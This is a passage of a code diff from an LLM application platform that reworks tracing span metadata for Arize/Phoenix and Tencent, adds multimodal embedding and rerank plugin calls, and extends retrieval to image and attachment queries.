trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/ops/tencent_trace/span_builder.py b/api/core/ops/tencent_trace/span_builder.py index db92e9b8bd..26e8779e3e 100644 --- a/api/core/ops/tencent_trace/span_builder.py +++ b/api/core/ops/tencent_trace/span_builder.py @@ -222,59 +222,6 @@ class TencentSpanBuilder: links=links, ) - @staticmethod - def build_message_llm_span( - trace_info: MessageTraceInfo, trace_id: int, parent_span_id: int, user_id: str - ) -> SpanData: - """Build LLM span for message traces with detailed LLM attributes.""" - status = Status(StatusCode.OK) - if trace_info.error: - status = Status(StatusCode.ERROR, trace_info.error) - - # Extract model information from `metadata`` or `message_data` - trace_metadata = trace_info.metadata or {} - message_data = trace_info.message_data or {} - - model_provider = trace_metadata.get("ls_provider") or ( - message_data.get("model_provider", "") if isinstance(message_data, dict) else "" - ) - model_name = trace_metadata.get("ls_model_name") or ( - message_data.get("model_id", "") if isinstance(message_data, dict) else "" - ) - - inputs_str = str(trace_info.inputs or "") - outputs_str = str(trace_info.outputs or "") - - attributes = { - GEN_AI_SESSION_ID: trace_metadata.get("conversation_id", ""), - GEN_AI_USER_ID: str(user_id), - GEN_AI_SPAN_KIND: GenAISpanKind.GENERATION.value, - GEN_AI_FRAMEWORK: "dify", - GEN_AI_MODEL_NAME: str(model_name), - GEN_AI_PROVIDER: str(model_provider), - GEN_AI_USAGE_INPUT_TOKENS: str(trace_info.message_tokens or 0), - GEN_AI_USAGE_OUTPUT_TOKENS: str(trace_info.answer_tokens or 0), - GEN_AI_USAGE_TOTAL_TOKENS: str(trace_info.total_tokens or 0), - GEN_AI_PROMPT: inputs_str, - GEN_AI_COMPLETION: outputs_str, - INPUT_VALUE: inputs_str, - OUTPUT_VALUE: outputs_str, - } - - if trace_info.is_streaming_request: - attributes[GEN_AI_IS_STREAMING_REQUEST] = "true" - - return SpanData( - trace_id=trace_id, - parent_span_id=parent_span_id, - span_id=TencentTraceUtils.convert_to_span_id(trace_info.message_id, "llm"), - name="GENERATION", - start_time=TencentSpanBuilder._get_time_nanoseconds(trace_info.start_time), - end_time=TencentSpanBuilder._get_time_nanoseconds(trace_info.end_time), - attributes=attributes, - status=status, - ) - @staticmethod def build_tool_span(trace_info: ToolTraceInfo, trace_id: int, parent_span_id: int) -> SpanData: """Build tool span.""" diff --git a/api/core/ops/tencent_trace/tencent_trace.py b/api/core/ops/tencent_trace/tencent_trace.py index c345cee7a9..93ec186863 100644 --- a/api/core/ops/tencent_trace/tencent_trace.py +++ b/api/core/ops/tencent_trace/tencent_trace.py @@ -107,12 +107,8 @@ class TencentDataTrace(BaseTraceInstance): links.append(TencentTraceUtils.create_link(trace_info.trace_id)) message_span = TencentSpanBuilder.build_message_span(trace_info, trace_id, str(user_id), links) - self.trace_client.add_span(message_span) - # Add LLM child span with detailed attributes - parent_span_id = TencentTraceUtils.convert_to_span_id(trace_info.message_id, "message") - llm_span = TencentSpanBuilder.build_message_llm_span(trace_info, trace_id, parent_span_id, str(user_id)) - self.trace_client.add_span(llm_span) + self.trace_client.add_span(message_span) self._record_message_llm_metrics(trace_info) diff --git a/api/core/plugin/impl/base.py b/api/core/plugin/impl/base.py index a1c84bd5d9..7bb2749afa 100644 --- a/api/core/plugin/impl/base.py +++ b/api/core/plugin/impl/base.py @@ -39,7 +39,7 @@ from core.trigger.errors import ( plugin_daemon_inner_api_baseurl = URL(str(dify_config.PLUGIN_DAEMON_URL)) _plugin_daemon_timeout_config = cast( float | httpx.Timeout | None, - getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 300.0), + getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 600.0), ) plugin_daemon_request_timeout: httpx.Timeout | None if _plugin_daemon_timeout_config is None: diff --git a/api/core/plugin/impl/model.py b/api/core/plugin/impl/model.py index 5dfc3c212e..5d70980967 100644 --- a/api/core/plugin/impl/model.py +++ b/api/core/plugin/impl/model.py @@ -6,7 +6,7 @@ from core.model_runtime.entities.llm_entities import LLMResultChunk from core.model_runtime.entities.message_entities import PromptMessage, PromptMessageTool from core.model_runtime.entities.model_entities import AIModelEntity from core.model_runtime.entities.rerank_entities import RerankResult -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.utils.encoders import jsonable_encoder from core.plugin.entities.plugin_daemon import ( PluginBasicBooleanResponse, @@ -243,14 +243,14 @@ class PluginModelClient(BasePluginClient): credentials: dict, texts: list[str], input_type: str, - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke text embedding """ response = self._request_with_plugin_daemon_response_stream( method="POST", path=f"plugin/{tenant_id}/dispatch/text_embedding/invoke", - type_=TextEmbeddingResult, + type_=EmbeddingResult, data=jsonable_encoder( { "user_id": user_id, @@ -275,6 +275,48 @@ class PluginModelClient(BasePluginClient): raise ValueError("Failed to invoke text embedding") + def invoke_multimodal_embedding( + self, + tenant_id: str, + user_id: str, + plugin_id: str, + provider: str, + model: str, + credentials: dict, + documents: list[dict], + input_type: str, + ) -> EmbeddingResult: + """ + Invoke file embedding + """ + response = self._request_with_plugin_daemon_response_stream( + method="POST", + path=f"plugin/{tenant_id}/dispatch/multimodal_embedding/invoke", + type_=EmbeddingResult, + data=jsonable_encoder( + { + "user_id": user_id, + "data": { + "provider": provider, + "model_type": "text-embedding", + "model": model, + "credentials": credentials, + "documents": documents, + "input_type": input_type, + }, + } + ), + headers={ + "X-Plugin-ID": plugin_id, + "Content-Type": "application/json", + }, + ) + + for resp in response: + return resp + + raise ValueError("Failed to invoke file embedding") + def get_text_embedding_num_tokens( self, tenant_id: str, @@ -361,6 +403,51 @@ class PluginModelClient(BasePluginClient): raise ValueError("Failed to invoke rerank") + def invoke_multimodal_rerank( + self, + tenant_id: str, + user_id: str, + plugin_id: str, + provider: str, + model: str, + credentials: dict, + query: dict, + docs: list[dict], + score_threshold: float | None = None, + top_n: int | None = None, + ) -> RerankResult: + """ + Invoke multimodal rerank + """ + response = self._request_with_plugin_daemon_response_stream( + method="POST", + path=f"plugin/{tenant_id}/dispatch/multimodal_rerank/invoke", + type_=RerankResult, + data=jsonable_encoder( + { + "user_id": user_id, + "data": { + "provider": provider, + "model_type": "rerank", + "model": model, + "credentials": credentials, + "query": query, + "docs": docs, + "score_threshold": score_threshold, + "top_n": top_n, + }, + } + ), + headers={ + "X-Plugin-ID": plugin_id, + "Content-Type": "application/json", + }, + ) + for resp in response: + return resp + + raise ValueError("Failed to invoke multimodal rerank") + def invoke_tts( self, tenant_id: str, diff --git a/api/core/prompt/simple_prompt_transform.py b/api/core/prompt/simple_prompt_transform.py index d1d518a55d..f072092ea7 100644 --- a/api/core/prompt/simple_prompt_transform.py +++ b/api/core/prompt/simple_prompt_transform.py @@ -49,6 +49,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: inputs = {key: str(value) for key, value in inputs.items()} @@ -64,6 +65,7 @@ class SimplePromptTransform(PromptTransform): memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) else: prompt_messages, stops = self._get_completion_model_prompt_messages( @@ -76,6 +78,7 @@ class SimplePromptTransform(PromptTransform): memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) return prompt_messages, stops @@ -187,6 +190,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: prompt_messages: list[PromptMessage] = [] @@ -216,9 +220,9 @@ class SimplePromptTransform(PromptTransform): ) if query: - prompt_messages.append(self._get_last_user_message(query, files, image_detail_config)) + prompt_messages.append(self._get_last_user_message(query, files, image_detail_config, context_files)) else: - prompt_messages.append(self._get_last_user_message(prompt, files, image_detail_config)) + prompt_messages.append(self._get_last_user_message(prompt, files, image_detail_config, context_files)) return prompt_messages, None @@ -233,6 +237,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: # get prompt prompt, prompt_rules = self._get_prompt_str_and_rules( @@ -275,20 +280,27 @@ class SimplePromptTransform(PromptTransform): if stops is not None and len(stops) == 0: stops = None - return [self._get_last_user_message(prompt, files, image_detail_config)], stops + return [self._get_last_user_message(prompt, files, image_detail_config, context_files)], stops def _get_last_user_message( self, prompt: str, files: Sequence["File"], image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> UserPromptMessage: + prompt_message_contents: list[PromptMessageContentUnionTypes] = [] if files: - prompt_message_contents: list[PromptMessageContentUnionTypes] = [] for file in files: prompt_message_contents.append( file_manager.to_prompt_message_content(file, image_detail_config=image_detail_config) ) + if context_files: + for file in context_files: + prompt_message_contents.append( + file_manager.to_prompt_message_content(file, image_detail_config=image_detail_config) + ) + if prompt_message_contents: prompt_message_contents.append(TextPromptMessageContent(data=prompt)) prompt_message = UserPromptMessage(content=prompt_message_contents) diff --git a/api/core/rag/data_post_processor/data_post_processor.py b/api/core/rag/data_post_processor/data_post_processor.py index cc946a72c3..bfa8781e9f 100644 --- a/api/core/rag/data_post_processor/data_post_processor.py +++ b/api/core/rag/data_post_processor/data_post_processor.py @@ -2,6 +2,7 @@ from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.model_entities import ModelType from core.model_runtime.errors.invoke import InvokeAuthorizationError from core.rag.data_post_processor.reorder import ReorderRunner +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.entity.weight import KeywordSetting, VectorSetting, Weights from core.rag.rerank.rerank_base import BaseRerankRunner @@ -30,9 +31,10 @@ class DataPostProcessor: score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: if self.rerank_runner: - documents = self.rerank_runner.run(query, documents, score_threshold, top_n, user) + documents = self.rerank_runner.run(query, documents, score_threshold, top_n, user, query_type) if self.reorder_runner: documents = self.reorder_runner.run(documents) diff --git a/api/core/rag/datasource/retrieval_service.py b/api/core/rag/datasource/retrieval_service.py index 2290de19bc..a139fba4d0 100644 --- a/api/core/rag/datasource/retrieval_service.py +++ b/api/core/rag/datasource/retrieval_service.py @@ -1,23 +1,30 @@ import concurrent.futures from concurrent.futures import ThreadPoolExecutor +from typing import Any from flask import Flask, current_app from sqlalchemy import select from sqlalchemy.orm import Session, load_only from configs import dify_config +from core.model_manager import ModelManager +from core.model_runtime.entities.model_entities import ModelType from core.rag.data_post_processor.data_post_processor import DataPostProcessor from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.datasource.vdb.vector_factory import Vector from core.rag.embedding.retrieval import RetrievalSegments from core.rag.entities.metadata_entities import MetadataCondition -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_type import RerankMode from core.rag.retrieval.retrieval_methods import RetrievalMethod +from core.tools.signature import sign_upload_file from extensions.ext_database import db -from models.dataset import ChildChunk, Dataset, DocumentSegment +from models.dataset import ChildChunk, Dataset, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument +from models.model import UploadFile from services.external_knowledge_service import ExternalDatasetService default_retrieval_model = { @@ -37,14 +44,15 @@ class RetrievalService: retrieval_method: RetrievalMethod, dataset_id: str, query: str, - top_k: int, + top_k: int = 4, score_threshold: float | None = 0.0, reranking_model: dict | None = None, reranking_mode: str = "reranking_model", weights: dict | None = None, document_ids_filter: list[str] | None = None, + attachment_ids: list | None = None, ): - if not query: + if not query and not attachment_ids: return [] dataset = cls._get_dataset(dataset_id) if not dataset: @@ -56,69 +64,52 @@ class RetrievalService: # Optimize multithreading with thread pools with ThreadPoolExecutor(max_workers=dify_config.RETRIEVAL_SERVICE_EXECUTORS) as executor: # type: ignore futures = [] - if retrieval_method == RetrievalMethod.KEYWORD_SEARCH: + retrieval_service = RetrievalService() + if query: futures.append( executor.submit( - cls.keyword_search, + retrieval_service._retrieve, flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, - query=query, - top_k=top_k, - all_documents=all_documents, - exceptions=exceptions, - document_ids_filter=document_ids_filter, - ) - ) - if RetrievalMethod.is_support_semantic_search(retrieval_method): - futures.append( - executor.submit( - cls.embedding_search, - flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, + retrieval_method=retrieval_method, + dataset=dataset, query=query, top_k=top_k, score_threshold=score_threshold, reranking_model=reranking_model, - all_documents=all_documents, - retrieval_method=retrieval_method, - exceptions=exceptions, + reranking_mode=reranking_mode, + weights=weights, document_ids_filter=document_ids_filter, + attachment_id=None, + all_documents=all_documents, + exceptions=exceptions, ) ) - if RetrievalMethod.is_support_fulltext_search(retrieval_method): - futures.append( - executor.submit( - cls.full_text_index_search, - flask_app=current_app._get_current_object(), # type: ignore - dataset_id=dataset_id, - query=query, - top_k=top_k, - score_threshold=score_threshold, - reranking_model=reranking_model, - all_documents=all_documents, - retrieval_method=retrieval_method, - exceptions=exceptions, - document_ids_filter=document_ids_filter, + if attachment_ids: + for attachment_id in attachment_ids: + futures.append( + executor.submit( + retrieval_service._retrieve, + flask_app=current_app._get_current_object(), # type: ignore + retrieval_method=retrieval_method, + dataset=dataset, + query=None, + top_k=top_k, + score_threshold=score_threshold, + reranking_model=reranking_model, + reranking_mode=reranking_mode, + weights=weights, + document_ids_filter=document_ids_filter, + attachment_id=attachment_id, + all_documents=all_documents, + exceptions=exceptions, + ) ) - ) - concurrent.futures.wait(futures, timeout=30, return_when=concurrent.futures.ALL_COMPLETED) + + concurrent.futures.wait(futures, timeout=3600, return_when=concurrent.futures.ALL_COMPLETED) if exceptions: raise ValueError(";\n".join(exceptions)) - # Deduplicate documents for hybrid search to avoid duplicate chunks - if retrieval_method == RetrievalMethod.HYBRID_SEARCH: - all_documents = cls._deduplicate_documents(all_documents) - data_post_processor = DataPostProcessor( - str(dataset.tenant_id), reranking_mode, reranking_model, weights, False - ) - all_documents = data_post_processor.invoke( - query=query, - documents=all_documents, - score_threshold=score_threshold, - top_n=top_k, - ) - return all_documents @classmethod @@ -223,6 +214,7 @@ class RetrievalService: retrieval_method: RetrievalMethod, exceptions: list, document_ids_filter: list[str] | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ): with flask_app.app_context(): try: @@ -231,14 +223,30 @@ class RetrievalService: raise ValueError("dataset not found") vector = Vector(dataset=dataset) - documents = vector.search_by_vector( - query, - search_type="similarity_score_threshold", - top_k=top_k, - score_threshold=score_threshold, - filter={"group_id": [dataset.id]}, - document_ids_filter=document_ids_filter, - ) + documents = [] + if query_type == QueryType.TEXT_QUERY: + documents.extend( + vector.search_by_vector( + query, + search_type="similarity_score_threshold", + top_k=top_k, + score_threshold=score_threshold, + filter={"group_id": [dataset.id]}, + document_ids_filter=document_ids_filter, + ) + ) + if query_type == QueryType.IMAGE_QUERY: + if not dataset.is_multimodal: + return + documents.extend( + vector.search_by_file( + file_id=query, + top_k=top_k, + score_threshold=score_threshold, + filter={"group_id": [dataset.id]}, + document_ids_filter=document_ids_filter, + ) + ) if documents: if ( @@ -250,14 +258,37 @@ class RetrievalService: data_post_processor = DataPostProcessor( str(dataset.tenant_id), str(RerankMode.RERANKING_MODEL), reranking_model, None, False ) - all_documents.extend( - data_post_processor.invoke( - query=query, - documents=documents, - score_threshold=score_threshold, - top_n=len(documents), + if dataset.is_multimodal: + model_manager = ModelManager() + is_support_vision = model_manager.check_model_support_vision( + tenant_id=dataset.tenant_id, + provider=reranking_model.get("reranking_provider_name") or "", + model=reranking_model.get("reranking_model_name") or "", + model_type=ModelType.RERANK, + ) + if is_support_vision: + all_documents.extend( + data_post_processor.invoke( + query=query, + documents=documents, + score_threshold=score_threshold, + top_n=len(documents), + query_type=query_type, + ) + ) + else: + # not effective, return original documents + all_documents.extend(documents) + else: + all_documents.extend( + data_post_processor.invoke( + query=query, + documents=documents, + score_threshold=score_threshold, + top_n=len(documents), + query_type=query_type, + ) ) - ) else: all_documents.extend(documents) except Exception as e: @@ -339,103 +370,161 @@ class RetrievalService: records = [] include_segment_ids = set() segment_child_map = {} - - # Process documents - for document in documents: - document_id = document.metadata.get("document_id") - if document_id not in dataset_documents: - continue - - dataset_document = dataset_documents[document_id] - if not dataset_document: - continue - - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: - # Handle parent-child documents - child_index_node_id = document.metadata.get("doc_id") - child_chunk_stmt = select(ChildChunk).where(ChildChunk.index_node_id == child_index_node_id) - child_chunk = db.session.scalar(child_chunk_stmt) - - if not child_chunk: + segment_file_map = {} + with Session(bind=db.engine, expire_on_commit=False) as session: + # Process documents + for document in documents: + segment_id = None + attachment_info = None + child_chunk = None + document_id = document.metadata.get("document_id") + if document_id not in dataset_documents: continue - segment = ( - db.session.query(DocumentSegment) - .where( - DocumentSegment.dataset_id == dataset_document.dataset_id, - DocumentSegment.enabled == True, - DocumentSegment.status == "completed", - DocumentSegment.id == child_chunk.segment_id, - ) - .options( - load_only( - DocumentSegment.id, - DocumentSegment.content, - DocumentSegment.answer, + dataset_document = dataset_documents[document_id] + if not dataset_document: + continue + + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: + # Handle parent-child documents + if document.metadata.get("doc_type") == DocType.IMAGE: + attachment_info_dict = cls.get_segment_attachment_info( + dataset_document.dataset_id, + dataset_document.tenant_id, + document.metadata.get("doc_id") or "", + session, ) + if attachment_info_dict: + attachment_info = attachment_info_dict["attachment_info"] + segment_id = attachment_info_dict["segment_id"] + else: + child_index_node_id = document.metadata.get("doc_id") + child_chunk_stmt = select(ChildChunk).where(ChildChunk.index_node_id == child_index_node_id) + child_chunk = session.scalar(child_chunk_stmt) + + if not child_chunk: + continue + segment_id = child_chunk.segment_id + + if not segment_id: + continue + + segment = ( + session.query(DocumentSegment) + .where( + DocumentSegment.dataset_id == dataset_document.dataset_id, + DocumentSegment.enabled == True, + DocumentSegment.status == "completed", + DocumentSegment.id == segment_id, + ) + .first() ) - .first() - ) - if not segment: - continue + if not segment: + continue - if segment.id not in include_segment_ids: - include_segment_ids.add(segment.id) - child_chunk_detail = { - "id": child_chunk.id, - "content": child_chunk.content, - "position": child_chunk.position, - "score": document.metadata.get("score", 0.0), - } - map_detail = { - "max_score": document.metadata.get("score", 0.0), - "child_chunks": [child_chunk_detail], - } - segment_child_map[segment.id] = map_detail - record = { - "segment": segment, - } - records.append(record) + if segment.id not in include_segment_ids: + include_segment_ids.add(segment.id) + if child_chunk: + child_chunk_detail = { + "id": child_chunk.id, + "content": child_chunk.content, + "position": child_chunk.position, + "score": document.metadata.get("score", 0.0), + } + map_detail = { + "max_score": document.metadata.get("score", 0.0), + "child_chunks": [child_chunk_detail], + } + segment_child_map[segment.id] = map_detail + record = { + "segment": segment, + } + if attachment_info: + segment_file_map[segment.id] = [attachment_info] + records.append(record) + else: + if child_chunk: + child_chunk_detail = { + "id": child_chunk.id, + "content": child_chunk.content, + "position": child_chunk.position, + "score": document.metadata.get("score", 0.0), + } + if segment.id in segment_child_map: + segment_child_map[segment.id]["child_chunks"].append(child_chunk_detail) + 